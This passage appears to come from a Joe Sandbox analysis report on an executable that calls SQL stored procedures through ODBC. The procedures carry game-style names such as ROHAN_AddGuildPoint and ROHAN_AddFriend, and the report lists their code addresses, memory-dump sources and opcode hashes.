                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: { ? = CALL [ROHAN2_AddGuildPoint](?,?) }
                                                                                      • API String ID: 0-49476596
                                                                                      • Opcode ID: 0d8a336e45d7f3ff4bff380a14a5159633bdff6bb5195cccb1767161cdb5c3f4
                                                                                      • Instruction ID: 9b20bdab95f3f81e3f5bfa499e7535c1a53796ee98fea5f8b6b642512667e2f6
                                                                                      • Opcode Fuzzy Hash: 0d8a336e45d7f3ff4bff380a14a5159633bdff6bb5195cccb1767161cdb5c3f4
                                                                                      • Instruction Fuzzy Hash: CF21C2B164031CABEB65CF54CC52FDA7378EB48B14F208289F7146A2C5D6B56B818B9C
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{ ? = CALL [ROHAN_ChangeMode](?,?) } ,000000FD), ref: 0042738B
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 004273CA
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 004273FF
                                                                                      • #72.ODBC32(?,00000000,00000001,000000FA,000000FA,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 00427437
                                                                                      Strings
                                                                                      • { ? = CALL [ROHAN_ChangeMode](?,?) } , xrefs: 00427382
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: { ? = CALL [ROHAN_ChangeMode](?,?) }
                                                                                      • API String ID: 0-3877255641
                                                                                      • Opcode ID: 384ab20f0546fc2233f925070bee1d2decaf677e5229bc83f648ca4c3dad5d73
                                                                                      • Instruction ID: 49730e53cb3e955e55c61bd011f646299086e565a87bd92b7896c3a12efa04d4
                                                                                      • Opcode Fuzzy Hash: 384ab20f0546fc2233f925070bee1d2decaf677e5229bc83f648ca4c3dad5d73
                                                                                      • Instruction Fuzzy Hash: 842124B0641215BBEB20DF94DC56F9A7374EB48724F208389F6146A2D0D6B5ED808F58
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{ ? = CALL [ROHAN_DelNGuildPostBox] (?,?) } ,000000FD), ref: 00425366
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 004253A5
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 004253DA
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 00425412
                                                                                      Strings
                                                                                      • { ? = CALL [ROHAN_DelNGuildPostBox] (?,?) } , xrefs: 0042535D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: { ? = CALL [ROHAN_DelNGuildPostBox] (?,?) }
                                                                                      • API String ID: 0-3373684646
                                                                                      • Opcode ID: 3aba0d378f737d1586e7c1f910a23a1849eb5a3ae8cc14868435a96fe93d128d
                                                                                      • Instruction ID: e532eb0afef290248b5d0c220d3ebe591063f20c77320489a423499d04b9451f
                                                                                      • Opcode Fuzzy Hash: 3aba0d378f737d1586e7c1f910a23a1849eb5a3ae8cc14868435a96fe93d128d
                                                                                      • Instruction Fuzzy Hash: BE21C1B1A44218ABEB64CF54CC52FDD7375EB84718F208289F71C6E2D4D6B56D808F58
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{ ? = CALL [ROHAN_AddNGuildPoint](?,?) } ,000000FD), ref: 004283FA
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 00428439
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 0042846E
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 004284A6
                                                                                      Strings
                                                                                      • { ? = CALL [ROHAN_AddNGuildPoint](?,?) } , xrefs: 004283F1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: { ? = CALL [ROHAN_AddNGuildPoint](?,?) }
                                                                                      • API String ID: 0-2183664347
                                                                                      • Opcode ID: 174f64f61ad1d72084ea93381f721c849d0c156338026bd22a9d44eb6d8af3e7
                                                                                      • Instruction ID: 55ca30c0acf8b71f78a8aba053163fda37d8873aebe58dbffd643cc6414e14da
                                                                                      • Opcode Fuzzy Hash: 174f64f61ad1d72084ea93381f721c849d0c156338026bd22a9d44eb6d8af3e7
                                                                                      • Instruction Fuzzy Hash: DE2106B0A41314ABEB65CF54CC52F997378EB48B24F604189F7146F2C4D6B5AE808F5C
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{ ? = CALL [ROHAN_AddGuildWarRecord](?,?) } ,000000FD), ref: 004284D9
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 00428518
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 0042854D
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 00428585
                                                                                      Strings
                                                                                      • { ? = CALL [ROHAN_AddGuildWarRecord](?,?) } , xrefs: 004284D0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: { ? = CALL [ROHAN_AddGuildWarRecord](?,?) }
                                                                                      • API String ID: 0-2730228661
                                                                                      • Opcode ID: 483482a6c4d0350518f3f930d0d105495dad4d13fd6e6d690810b8d5f6db64ba
                                                                                      • Instruction ID: 610230418bf715ce206ba5f868ebbf1526382c25672b55a0e872bc96a8bbe710
                                                                                      • Opcode Fuzzy Hash: 483482a6c4d0350518f3f930d0d105495dad4d13fd6e6d690810b8d5f6db64ba
                                                                                      • Instruction Fuzzy Hash: 3A21E2B1640314ABEB25DF44CC92F997378EB44B14F208289F7186E2C4D6B56B80CB58
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{? = CALL [ROHAN_AddFriend] (?,?)},000000FD), ref: 00432574
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 004325B3
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 004325E8
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 00432620
                                                                                      Strings
                                                                                      • {? = CALL [ROHAN_AddFriend] (?,?)}, xrefs: 0043256B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {? = CALL [ROHAN_AddFriend] (?,?)}
                                                                                      • API String ID: 0-85479648
                                                                                      • Opcode ID: 3411ee5c6095c67c4c9f3f79f8f1ba2b5ff74a24b646adedd602e5e7fa35d676
                                                                                      • Instruction ID: 5a1cbccc0f4c14240a2c55208cd143057dabce7fbfe967b2c795bd0e211eee18
                                                                                      • Opcode Fuzzy Hash: 3411ee5c6095c67c4c9f3f79f8f1ba2b5ff74a24b646adedd602e5e7fa35d676
                                                                                      • Instruction Fuzzy Hash: 802115B0A80317ABEB24CF64CC42FBA73B4FB44714F14C199F6646E2C4D9B169408F98
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{ ? = CALL [ROHAN_InsSubGuild](?,?) } ,000000FD), ref: 0042B609
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 0042B648
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 0042B67D
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0042B6B5
                                                                                      Strings
                                                                                      • { ? = CALL [ROHAN_InsSubGuild](?,?) } , xrefs: 0042B600
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: { ? = CALL [ROHAN_InsSubGuild](?,?) }
                                                                                      • API String ID: 0-3984345258
                                                                                      • Opcode ID: 5f23991be715bd475d8cc4ed6dbfc0e4424e3b340cb7eb0008ec88f5b33a1f44
                                                                                      • Instruction ID: a9205ad46e27d329a265768c2d2b7b9d471a15ef846da9abcca373fc6ec8e0cc
                                                                                      • Opcode Fuzzy Hash: 5f23991be715bd475d8cc4ed6dbfc0e4424e3b340cb7eb0008ec88f5b33a1f44
                                                                                      • Instruction Fuzzy Hash: 9321F1B0A40218ABEB25CF44DC52FA97378EB84B54F10828EF7187E2C4D6F56E408F58
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{? = CALL [ROHAN_ConsignUnregistItem] (?,?)},000000FD), ref: 004305BD
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 004305FC
                                                                                      • #72.ODBC32(?,00000000,00000001,000000EE,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 00430631
                                                                                      • #72.ODBC32(?,00000000,00000001,000000EE,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000EE,00000004,00000000), ref: 00430669
                                                                                      Strings
                                                                                      • {? = CALL [ROHAN_ConsignUnregistItem] (?,?)}, xrefs: 004305B4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
